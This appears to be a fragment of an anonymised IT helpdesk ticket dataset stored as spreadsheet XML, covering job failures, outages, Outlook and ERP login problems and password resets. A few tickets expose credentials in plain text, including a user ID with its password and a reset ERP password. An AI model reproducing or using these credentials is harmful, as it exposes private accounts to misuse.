    <t xml:space="preserve">job Job_579 failed in job_scheduler at: 10/24/2016 05:13:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_579 failed in job_scheduler at: 10/24/2016 05:13:00</t>
  </si>
  <si>
    <t>lxgtvwyh jnkchfap</t>
  </si>
  <si>
    <t>msd crm error opening outlook</t>
  </si>
  <si>
    <t>hello_x000D_
when open outlook crm goes on erro with .net and if i press continue i can work with outlook but not with crm plug-in._x000D_
otherwise outlook crash.</t>
  </si>
  <si>
    <t>rcdanwut kzbfstxm</t>
  </si>
  <si>
    <t>wk38 - qdxyifhj zbwtunpy</t>
  </si>
  <si>
    <t>hallo, kannst du einmal nachsehen, wo der e-mail button ist am drucker. er ist weg! :-) danke. uwe</t>
  </si>
  <si>
    <t>hi, few users are not able to logon to crm website.</t>
  </si>
  <si>
    <t>link : 
users:
ottyhddok
thielpwii2e
lobodeid2d
loksdkdjwda
please get in touch with them</t>
  </si>
  <si>
    <t>hadbkvwt touedfyr</t>
  </si>
  <si>
    <t>jtboznci fiormedp</t>
  </si>
  <si>
    <t>activation of outlook email access on samsung s7 edge device for nzuofeam exszgtwd</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: kbclinop.vsczklfp@gmail.com
hi,
please usa email access on new samsung s7 device for nzuofeam exszgtwd  (md apac &amp; vp cpmmecial).  please find information as follow :
email: gjbcengineering_tooll.gidsekfo@gmail.com
manager's name : chucashadqc wsljdqqds
is this a replacement of your old device?  yes, as the existing old samsung s5 phone is no longer in use.  please remove access on the old samsung s5 device.
</t>
  </si>
  <si>
    <t>kbclinop vsczklfp</t>
  </si>
  <si>
    <t xml:space="preserve">probleme mit bluescreen </t>
  </si>
  <si>
    <t xml:space="preserve">hallo ,
gerade eben ist der computer an meinem arbeitsplatz zum wiederholten male ausgestiegen und hat lediglich einen blauen bildschirm mit weiÃŸer schrift dargestellt.
bitte schau dir das vor ort mal an.
</t>
  </si>
  <si>
    <t>mtcywlxv cklzmxyr</t>
  </si>
  <si>
    <t>no display on desk phone.</t>
  </si>
  <si>
    <t>jctnelqs lansuiwe</t>
  </si>
  <si>
    <t>probleme mit lan fÃ¼r rechner erodiermaschine\ dtlmbcrx mwuateyx</t>
  </si>
  <si>
    <t>dtlmbcrx mwuateyx</t>
  </si>
  <si>
    <t>network outage: south amerirtca -(rrc) network company-sa-south amerirtca-dmvpn-1811-router) is down since 3:53am on 10/24/16, no backup circuit</t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ________3:53am on 10/24/16______________x000D_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____no____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</si>
  <si>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EU_tool is hanging and slow at the loaction.</t>
  </si>
  <si>
    <t xml:space="preserve">EU_tool is hanging and slow at the loaction.
</t>
  </si>
  <si>
    <t>vaqsmniw dtgnkzvp</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_593 failed in job_scheduler at: 10/24/2016 04:05:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_593 failed in job_scheduler at: 10/24/2016 04:05:00</t>
  </si>
  <si>
    <t>german workflow objects from all folders are gone :de_industrial - 01, gen ing, transportation 1/2, ici</t>
  </si>
  <si>
    <t xml:space="preserve">german workflow objects from all folders are gone :de_industrial - 01, gen ing, transportation 1/2, ici. in the morning there were approximately 20 objects.. please check also the uk folder. </t>
  </si>
  <si>
    <t>mcytlpva jutxbdor</t>
  </si>
  <si>
    <t>problem with outlook</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rjsulvat.uanigkqc@gmail.com_x000D_
_x000D_
hello._x000D_
_x000D_
i cannot start outlook_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>netzlaufwerke auf auf quattro-4206, quattro-4201, quattro-4204 seit sonntag nicht verbunden.</t>
  </si>
  <si>
    <t>nbfyzlgu sdjtiqzv</t>
  </si>
  <si>
    <t>password reset - vvjotsgssea</t>
  </si>
  <si>
    <t>jwoiyzfp zlftrkpq</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze chat</t>
  </si>
  <si>
    <t>urvitans laqdwvgo</t>
  </si>
  <si>
    <t>mount request on lib6 prod weekly for job backup_tool-HostName_1048-weekly2</t>
  </si>
  <si>
    <t>help to change the windows password using password_management_tool password tool.</t>
  </si>
  <si>
    <t>help to change the windows password using password_management_tool password tool._x000D_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</si>
  <si>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wzkaptfd axqsyrem</t>
  </si>
  <si>
    <t>employee owned mobility agreement</t>
  </si>
  <si>
    <t>employee owned mobility agreement-</t>
  </si>
  <si>
    <t>mcysxfjw pcrdoewx</t>
  </si>
  <si>
    <t>chat feature for german language is not working</t>
  </si>
  <si>
    <t>please check if this is related to the change in name of the telephony_software queues from fdrf to germany._x000D_
please check the attached error._x000D_
chat url - _x000D_
english language chat works normally.</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_485 failed in job_scheduler at: 10/24/2016 02:47:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_485 failed in job_scheduler at: 10/24/2016 02:47:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1390 failed in job_scheduler at: 10/24/2016 02:43:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1390 failed in job_scheduler at: 10/24/2016 02:43:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1338 failed in job_scheduler at: 10/24/2016 02:21:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1338 failed in job_scheduler at: 10/24/2016 02:21:00</t>
  </si>
  <si>
    <t xml:space="preserve">material type "nd"  doesn Â´t create any requriment  for the zlz agreements orders </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qbewrpfu.lwibmxzo@gmail.com_x000D_
_x000D_
mit freundlichen grÃ¼ÃŸen / best </t>
  </si>
  <si>
    <t>qbewrpfu lwibmxzo</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_487 failed in job_scheduler at: 10/24/2016 02:16:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_487 failed in job_scheduler at: 10/24/2016 02:16:00</t>
  </si>
  <si>
    <t>passwort change failed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ovnedzxg.pylshdvb@gmail.com_x000D_
_x000D_
dear sir or madam,_x000D_
_x000D_
while changing my password through the password_management_tool password manager, following issue occured:_x000D_
_x000D_
[cid:image001.png@01d22dcd.0a760ce0]_x000D_
_x000D_
for the erp hcm production target it was not able to change the password. details say "please contact your helpdesk"._x000D_
_x000D_
many </t>
  </si>
  <si>
    <t>ovnedzxg pylshdvb</t>
  </si>
  <si>
    <t>etiketten drucker im bereich endkontrolle germany defekt</t>
  </si>
  <si>
    <t>funktionsstÃ¶rung</t>
  </si>
  <si>
    <t>tzmewbdv zjbuwmkn</t>
  </si>
  <si>
    <t xml:space="preserve">on;ly for uacyltoe hxgayczeing - sn </t>
  </si>
  <si>
    <t>ginjmaxk zumkvfeb</t>
  </si>
  <si>
    <t>drucker  wk1678</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: inqogkxz.rgmslhjn@gmail.com
hallo help,
drucker wk1678 funktioniert nicht mehr richtig.
etiketten verschieben sich.
bitte herrn himghtmelreich informieren.
vielen dank
best </t>
  </si>
  <si>
    <t>inqogkxz rgmslhjn</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1854 failed in job_scheduler at: 10/24/2016 01:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1854 failed in job_scheduler at: 10/24/2016 01:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2589 failed in job_scheduler at: 10/24/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2589 failed in job_scheduler at: 10/24/2016 01:30:00</t>
  </si>
  <si>
    <t>area code routing check for machine line</t>
  </si>
  <si>
    <t xml:space="preserve">the following area codes  below are being routed from our line to tyuhfljp zyjfpgtk when someone calls the help desk line.   they should be routed to lewbzysd gqdaikbv.   can you please check the routing?
area codes
41867
70567
51967
group 5 - dnis 5849
</t>
  </si>
  <si>
    <t>rwmeuzvy bpstvajw</t>
  </si>
  <si>
    <t>engineering tool login issue.</t>
  </si>
  <si>
    <t>engineering tool login issue._x000D_
help to change the windows password using password_management_tool password tool._x000D_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</si>
  <si>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seutrkhn jvdtilek</t>
  </si>
  <si>
    <t xml:space="preserve">network outage: - india () since sunday (oct 23rd):telecom_vendor_1 sr:25182480 </t>
  </si>
  <si>
    <t>what type of outage:  ___x__network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   _________oct 23rd___________x000D_
_x000D_
3.  scheduled maintenance ( power) ? __na_____    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? __na_____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ___no___    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ________     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  _________     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ____na___     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ____telecom_vendor_1:25182480 _____________________       _x000D_
_x000D_
12. notified  gsc  ____yes____     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze ticket</t>
  </si>
  <si>
    <t>pxsghrjd wiehqmka</t>
  </si>
  <si>
    <t>login not possible for trail employee thsaqsh 767202934</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: jhyazros.azdxonjg@gmail.com
hello
following  trail employee working in pthyu5 is unable to login his company hub mail id to view salary slip. request to rectify the same aerp
name: thsaqsh 
i number: 767202934
mail id: hjsastadad.kjddwdd2@company.com&lt;mailto:hjsastadad.kjddwdd2@company.com&gt;
user id: wshqqhdqh
password:vasanqi7892016
</t>
  </si>
  <si>
    <t>jhyazros azdxonjg</t>
  </si>
  <si>
    <t>outlookæ‰“ä¸å¼€</t>
  </si>
  <si>
    <t>æ‰“å¼€outlookæ—¶ï¼Œæ˜¾ç¤ºoutlook.ostæ–‡ä»¶é”™è¯¯ï¼Œç¨‹åºè‡ªåŠ¨å…³é—­ã€‚</t>
  </si>
  <si>
    <t>qayozbcd vwglmpjq</t>
  </si>
  <si>
    <t>circuit outage:india  plant primary telecom_vendor_1 circuit is down since 12:11 am on 10/24 et,site up on secondary telecom_vendor_3</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    __yes_______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______12:11 am on 10/24 et,________________x000D_
_x000D_
3.  scheduled maintenance ( power) ? ____na___    (yes/no/na)     company power  _________     provider power __________x000D_
                _x000D_
4.  scheduled maintenance ( network) ? ___na____    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000D_
_x000D_
5. does site have a backup circuit ?  ____yes__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   _____yes___     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  ___na______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ______na_____   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    _____na______    (yes/no/na) _x000D_
_x000D_
10. verified site working on backup circuit ?  ___yes____     (yes/no/na) _x000D_
_x000D_
11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    ______telecom_vendor_1 sr#25182415___________________       _x000D_
_x000D_
12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000D_
_x000D_
13.  additional diagnostics</t>
  </si>
  <si>
    <t>issue in wi fi  &amp; erp login</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ohdrnswl.rezuibdt@gmail.com_x000D_
_x000D_
hi,_x000D_
_x000D_
we are facing issue in wifi connectivity &amp; erp login._x000D_
_x000D_
[cid:image001.png@01d22dda.2a4fa9b0]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>ohdrnswl rezuibdt</t>
  </si>
  <si>
    <t>uacyltoe hxgaycze ignore</t>
  </si>
  <si>
    <t>we are unable to update the status in ticketing_tool tickets.</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tehsauadd.asjdidwni@company.com
hello,
please help us on this issue.
issue: we are unable to update the status for tickets in ticketing_tool tool.
below are the example tickets for your info.
[cid:image001.png@01d22dd8.c4f8ef00]
[cid:image002.png@01d22dd9.123015a0]
</t>
  </si>
  <si>
    <t>kmnsvzuq euyvihzc</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing-please ignore</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing-pls ignore</t>
  </si>
  <si>
    <t>rxoluzhy pnutohms</t>
  </si>
  <si>
    <t>uacyltoe hxgayczeing - please ignore</t>
  </si>
  <si>
    <t>excel database problem to run an automation</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: dwsyaqpr.bzasnmvw@gmail.com
hello,
i have developed one application which access database internally. i have already checked with few of my collogues and it's working fine.
the app is made for putyrh-5 press tool team. in their machine it's not working.
i have checked their system configuration as well which is same as my system.
system names: awywkwd67x217842, awyl629w8911908, awywkjsw7x217842
configuration: office-2010 (64bit)
this is the error what i get in their system:
[cid:image001.png@01d22941.20a282e0]
</t>
  </si>
  <si>
    <t>pchjidaq pvtxjaml</t>
  </si>
  <si>
    <t xml:space="preserve">production order number issue </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: zuxcfonv.nyhpkrbe@gmail.com
gso,
currently erp system production order number cannot be found after order number was identify enter in shopfloor , everything is fine before erp routine maintenance , please open a ticket for escalate the responsible team , that's very urgent !
[cid:image001.jpg@01d22de9.0bb3fa60] [cid:image004.png@01d22dea.7d33a720]
best </t>
  </si>
  <si>
    <t>GRP_43</t>
  </si>
  <si>
    <t>zuxcfonv nyhpkrbe</t>
  </si>
  <si>
    <t>error login on to the SID_34 system._x000D_
-verified user details.(employee# &amp; manager name)_x000D_
-user has tried the password_management_tool pwd manager._x000D_
-unlocked and reset the erp id to"daypay3"._x000D_
-caller confirmed that he was able to login._x000D_
-issue resolved.</t>
  </si>
  <si>
    <t>office excel ,powerpoint æ‰“å¼€ä¸€äº›æ–‡ä»¶æ—¶æç¤ºé”™è¯¯ã€‚</t>
  </si>
  <si>
    <t>office excel ,powerpoint æ‰“å¼€ä¸€äº›æ–‡ä»¶æ—¶æç¤ºé”™è¯¯ï¼Œç”µè„‘å’Œé‚®ä»¶é‡Œé¢ä¸€äº›æ–‡ä»¶æ— æ³•æ‰“å¼€ã€‚</t>
  </si>
  <si>
    <t>hdungfsc znuhyjkx</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u1 failed in job_scheduler at: 10/23/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u1 failed in job_scheduler at: 10/23/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u6 failed in job_scheduler at: 10/23/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u6 failed in job_scheduler at: 10/23/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job hr_payroll_na_u2 failed in job_scheduler at: 10/23/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job hr_payroll_na_u2 failed in job_scheduler at: 10/23/2016 23:00:00</t>
  </si>
  <si>
    <t>unable to access outlook</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: rxoynvgi.ntgdsehl@gmail.com
hi it team
kindly please assist as user tahamt unable to access outlook after he change his password.
thry ldikdowdfm
operation supervisor
company distribution services of asia pte ltd
email : rxoynvgi.ntgdsehl@gmail.com&lt;mailto:rxoynvgi.ntgdsehl@gmail.com&gt;</t>
  </si>
  <si>
    <t>rxoynvgi ntgdsehl</t>
  </si>
  <si>
    <t>please delete following these session created by tomyh678oen.</t>
  </si>
  <si>
    <t>GRP_44</t>
  </si>
  <si>
    <t>zsqabokr xbtsaodr</t>
  </si>
  <si>
    <t>when you look up price and availability local availability is zero and you can not see the global availability</t>
  </si>
  <si>
    <t xml:space="preserve">see attachment.  </t>
  </si>
  <si>
    <t>inquiry on impact awards</t>
  </si>
  <si>
    <t xml:space="preserve">from: wauhocsk vxuikqaf 
sent: sunday, october 23, 2016 9:28 pm
to: nwfodmhc exurcwkm
cc: lxrponic lyszwcxg; ranlpbmw djwkylif
subject: fw: impact awards
dear sirs
please be so kind and help. 
i have been asking hr but they told me that you are the right people to talk to
there have been done change on the position of director sales theeadjjd and we
when sales managers from theeadjjd direct side are plugging in impact award points â€“ the approver is still ranlpbmw djwkylif (should be wauhocsk vxuikqaf)
and i guess same issue might be with we (wester europe (there was a change of sales director as well)
we â€“ original sd â€“ crohuani dtjvhyob
we â€“ new sd â€“ ranlpbmw djwkylif
eseer â€“ original sd â€“ ranlpbmw djwkylif
eseer â€“ new sd â€“ wauhocsk vxuikqaf
would you be so kind and help us please ?
in case you need more info â€“ let me know
</t>
  </si>
  <si>
    <t>wauhocsk vxuikqaf</t>
  </si>
  <si>
    <t xml:space="preserve">please provide access for mails in my mobile phone. </t>
  </si>
  <si>
    <t xml:space="preserve">from: fdbgoamk hygxzklauthuchidambaramdnty _x000D_
sent: sunday, october 23, 2016 10:50 pm_x000D_
to: nwfodmhc exurcwkm_x000D_
subject: fw: your mobile device is temporarily blocked from synchronizing using exchange activesync until your administrator usas it access._x000D_
_x000D_
please provide access for mails in my mobile phone. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>fdbgoamk hygxzkla</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_csqe_dev_inc failed in job_scheduler at: 10/23/2016 18:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_csqe_dev_inc failed in job_scheduler at: 10/23/2016 18:10:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_771_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_771_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_450 failed in job_scheduler at: 10/23/2016 17:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_450 failed in job_scheduler at: 10/23/2016 17:59:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_768_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_768_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_HostName_920_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_HostName_920_prod_inc failed in job_scheduler at: 10/23/2016 17:59:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_2114 failed in job_scheduler at: 10/23/2016 17:32:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_2114 failed in job_scheduler at: 10/23/2016 17:32:00</t>
  </si>
  <si>
    <t>interface: gigabitethernet0/2 Â· usa-2950-access-sw02 on usa-2950-core-sw02 is down since 10/23/2016 3:52 pm</t>
  </si>
  <si>
    <t xml:space="preserve">outlook 365 </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: oetlgbfw.bsctrnwp@gmail.com
my outlook 365 is not working
please see if you can fix
thsadyu dwwlhews
sales manager gl2
oetlgbfw.bsctrnwp@gmail.com&lt;mailto:oetlgbfw.bsctrnwp@gmail.com&gt;</t>
  </si>
  <si>
    <t>oetlgbfw bsctrnwp</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_504 failed in job_scheduler at: 10/23/2016 13:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_504 failed in job_scheduler at: 10/23/2016 13:51:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_1422 failed in job_scheduler at: 10/23/2016 13:20:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_1422 failed in job_scheduler at: 10/23/2016 13:20:00</t>
  </si>
  <si>
    <t>HostName_587: germany server is down since 11:01 am  et on 10/23.</t>
  </si>
  <si>
    <t>rkupnshb gsmzfojw</t>
  </si>
  <si>
    <t>call came and there was only music and nothing else</t>
  </si>
  <si>
    <t>blank call // loud noise</t>
  </si>
  <si>
    <t>erp password reset</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: skmdgnuh.utgclesd@gmail.com
hi,
require to reset erp password.
login id:anantadth67
with warm </t>
  </si>
  <si>
    <t>skmdgnuh utgclesd</t>
  </si>
  <si>
    <t>call came and got disconnected</t>
  </si>
  <si>
    <t xml:space="preserve">job bwhrerattr failed in job_scheduler at: 10/23/2016 06:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwhrerattr failed in job_scheduler at: 10/23/2016 06:06:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_727 failed in job_scheduler at: 10/23/2016 02:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_727 failed in job_scheduler at: 10/23/2016 02:50:00</t>
  </si>
  <si>
    <t>HostName_1013 does not come up after weekly reboot</t>
  </si>
  <si>
    <t xml:space="preserve">HostName_1013 does not come up after weekly reboot.
note that recently there was a hdd and power supply replaced on this server.
c:\users\karashsnnsb&gt;ping HostName_1013
pinging HostName_1013.company.company.com [29.21.92.849] with 32 bytes of data:
request timed out.
request timed out.
request timed out.
request timed out.
ping statistics for 29.21.92.849:
    packets: sent = 4, received = 0, lost = 4 (100% loss),
c:\users\karashsnnsb&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_22_os_wly_dp failed in job_scheduler at: 10/23/2016 01:59:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_22_os_wly_dp failed in job_scheduler at: 10/23/2016 01:59:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3097 failed in job_scheduler at: 10/23/2016 01:50:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3097 failed in job_scheduler at: 10/23/2016 01:50:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3096 failed in job_scheduler at: 10/23/2016 00:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3096 failed in job_scheduler at: 10/23/2016 00:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3074 failed in job_scheduler at: 10/23/2016 00:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3074 failed in job_scheduler at: 10/23/2016 00:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_3076 failed in job_scheduler at: 10/23/2016 00:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_3076 failed in job_scheduler at: 10/23/2016 00:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_37cold failed in job_scheduler at: 10/23/2016 00:12:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_37cold failed in job_scheduler at: 10/23/2016 00:12:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/23/2016 00:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/23/2016 00:02:00</t>
  </si>
  <si>
    <t>pinovmqw icafkqmw</t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 10/22/2016 23:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_62_erp_wly_dp failed in job_scheduler at: 10/22/2016 23:03:00</t>
  </si>
  <si>
    <t>switch down - apac-company-rpmwh-2960s-access-sw01 located at apac is down since 10/22/2016 7:47 pm</t>
  </si>
  <si>
    <t>inquiry on expense report-erp</t>
  </si>
  <si>
    <t>eqwaiphc qxwfeuth</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_powder_prod_full failed in job_scheduler at: 10/22/2016 18:33:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_480 failed in job_scheduler at: 10/22/2016 17:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_480 failed in job_scheduler at: 10/22/2016 17:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/22/2016 17:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_sql_prod_full failed in job_scheduler at: 10/22/2016 17:04:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_466 failed in job_scheduler at: 10/22/2016 17:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_466 failed in job_scheduler at: 10/22/2016 17:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_482 failed in job_scheduler at: 10/22/2016 17:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_482 failed in job_scheduler at: 10/22/2016 17:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job bkbackup_tool_o365_primary_prod_full failed in job_scheduler at: 10/22/2016 17:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkbackup_tool_o365_primary_prod_full failed in job_scheduler at: 10/22/2016 17:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_581 failed in job_scheduler at: 10/22/2016 16:33:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_581 failed in job_scheduler at: 10/22/2016 16:33:00</t>
  </si>
  <si>
    <t>HostName_804: c:\ disk volume is over 85% space consumed.</t>
  </si>
  <si>
    <t>HostName_804: c:\ disk volume is over 85% space consumed.. space available: 4.4 g</t>
  </si>
  <si>
    <t xml:space="preserve">job bwdpmbkp failed in job_scheduler at: 10/22/2016 12:58:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bwdpmbkp failed in job_scheduler at: 10/22/2016 12:58:00</t>
  </si>
  <si>
    <t>HostName_1345 server is offline</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hpqjaory.gfrwmije@gmail.com_x000D_
_x000D_
we are experiencing an interruption in our systems involved with server HostName_1345._x000D_
most of the network printers are not operational due to this problem._x000D_
_x000D_
please advise._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>hpqjaory gfrwmije</t>
  </si>
  <si>
    <t xml:space="preserve">network outage : south_amerirtca  ktthasb site is hard dwon since 11:52 am on 21/10 et </t>
  </si>
  <si>
    <t>what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    _____no____     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   __11:52 am on 21/10 et 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</si>
  <si>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account unlock</t>
  </si>
  <si>
    <t>eboutzmn umzvbkfh</t>
  </si>
  <si>
    <t>the terminate action for kmzucxgq vjzfocgt has completed.</t>
  </si>
  <si>
    <t xml:space="preserve">from: 
sent: saturday, october 22, 2016 6:29 pm
to: nwfodmhc exurcwkm
subject: the terminate action for kmzucxgq vjzfocgt has completed.
hello , 
a termination for kmzucxgq vjzfocgt, 2s76891111595, effective 83.69.48.194 has been approved. 
</t>
  </si>
  <si>
    <t>ljpgedia bzqcwsgf</t>
  </si>
  <si>
    <t>problems with the data model in excel</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: bwfhtumx.japznrvb@gmail.com
i cannot get the data model to work in my excel
[cid:image001.jpg@01d22c57.57e6dc10]
[cid:image002.jpg@01d22c57.57e6dc10]
bwfhtumx japznrvb
regional controller
bwfhtumx.japznrvb@gmail.com&lt;mailto:bwfhtumx.japznrvb@gmail.com&gt;
</t>
  </si>
  <si>
